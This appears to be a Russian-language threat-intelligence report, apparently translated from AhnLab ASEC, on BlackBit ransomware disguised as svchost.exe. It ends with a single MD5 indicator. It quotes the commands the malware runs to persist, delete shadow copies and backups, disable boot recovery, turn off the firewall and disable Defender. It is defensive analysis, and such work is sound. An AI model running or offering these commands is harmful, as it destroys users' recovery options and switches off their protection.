BlackBit Ransomware IOCs

Центр экстренного реагирования AhnLab Security Emergency response Center (ASEC) недавно обнаружил распространение программы BlackBit ransomware, замаскированной под svchost.exe, в ходе мониторинга команды. Согласно данным внутренней инфраструктуры ASEC, программа BlackBit ransomware постоянно распространяется с сентября прошлого года.

BlackBit Ransomware

Программа-выкуп использует .NET Reactor для обфускации своего кода, что, вероятно, препятствует анализу. Можно заметить схожие характеристики между функционирующей программой-вымогателем и программой-вымогателем LokiLocker.
Перед выполнением процесса шифрования BlackBit ransomware проходит следующие подготовительные процедуры.

Для обеспечения живучести ransomware копирует себя в путь запуска и путь %AppData%, используя имя файла "winlogin.exe", и регистрирует себя в планировщике задач. Кроме того, он использует файлы BAT для регистрации связанных реестров, чтобы диспетчер задач не смог завершить его процессы.

"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN BlackBit /TR C:\Users\rapit\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

1 2	"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN BlackBit /TR C:\Users\rapit\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

После завершения процесса поддержания постоянства, программа-вымогатель удаляет файлы в Recycle.bin и тень тома, чтобы пользователи не смогли восстановить свои файлы после процесса шифрования.

vssadmin delete shadows /all /quiet
wbadmin DELETE SYSTEMSTATEBACKUP
wmic shadowcopy delete
wbadmin delete catalog -quiet
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no

vssadmin delete shadows /all /quiet

wbadmin DELETE SYSTEMSTATEBACKUP

wmic shadowcopy delete

wbadmin delete catalog -quiet

bcdedit /set {default} bootstatuspolicy ignoreallfailures

bcdedit /set {default} recoveryenabled no

Кроме того, программа-вымогатель изменяет сетевые настройки и завершает работу Windows Defender для утечки информации и предотвращения обнаружения.

netsh advfirewall set currentprofile state off
netsh firewall set opmode mode=disable
Установить значение реестра HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
Установите значение реестра HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
Установить значение реестра HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
Установить значение реестра HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware

BlackBit ransomware завершает следующие процессы. Вероятно, этот процесс выполняется для сканирования среды виртуальной машины и расширения диапазона шифрования.

wxserverview
qbcfmonitorservice
qbidpservice
fdlauncher
zhudongfangyu
vmware-usbarbitator64
vmware-converter
sqlbrowser
mydesktopqos
isqlplussvc
xfssvccon
mydesktopservice
ocautoupds
firefoxconfig
tbirdconfig
mysqld-nt
mysqld-opt
sqbcoreservice
thunderbird
culserver
quickboooks.fcs
zhundongfangyu
mssqlserver
mssql$contoso1
sqlserveragent

После завершения вышеупомянутого процесса ransomware начинает шифровать файлы. Затем она создает файлы Restore-My-Files.txt в каждой зараженной папке и показывает записку с выкупом.

Indicators of Compromise

MD5

3a7c3e8a378cd7a4fd83910937c23b19